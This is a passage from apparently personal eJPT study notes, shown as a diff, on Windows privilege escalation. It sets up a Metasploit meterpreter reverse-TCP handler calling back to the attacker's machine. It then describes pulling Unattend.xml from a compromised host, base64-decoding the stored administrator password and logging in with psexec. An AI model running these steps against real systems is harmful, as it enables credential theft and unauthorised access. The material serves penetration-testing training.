Miss-ikky/Mywiki/EJPT/Host & Network Penetration Testing/1. System and hostbased attacks/Windows/Windows Vulnerabilities.md

 	- set up msfconsole and set up multi/handler
 		- set payload windows/x64/meterpreter/reverse_tcp, LPORT 1234 LHOST kali ip
 		- Once you go back to the victim system and you click on the payload a meterpreter session will be started in the multi/handler
+		- sysinfo
+		- search -f Unattend.xml    (located: C:\Windows\Panther\Unattend.xml)
+		- cd to C:\\Windows\\Panther\\Unattend.xml
+		- dir
+		- download unattend.xml
+		- go into new window outside Metasploit
+	- in new terminal locate the file that you downloaded from victim
+		- cat unattend.xml
+		- look for user credentials  (autologon)
+		- the password (plaintext is false) is in base64
+		- we create a new file: vim password.txt
+			- paste the base64 password, quit
+		- use base64 package: base64 -d password.txt
+		- test the password: psexec.py Administrator@targetip
+			- enter password
+			- whoami

+Administrators often forget to delete these kind of files.
+Hackers can use these files to attain privileged account by getting the password from Unattended Windows Setup utility configuration file

 ### Dumping Hashes With mimikatz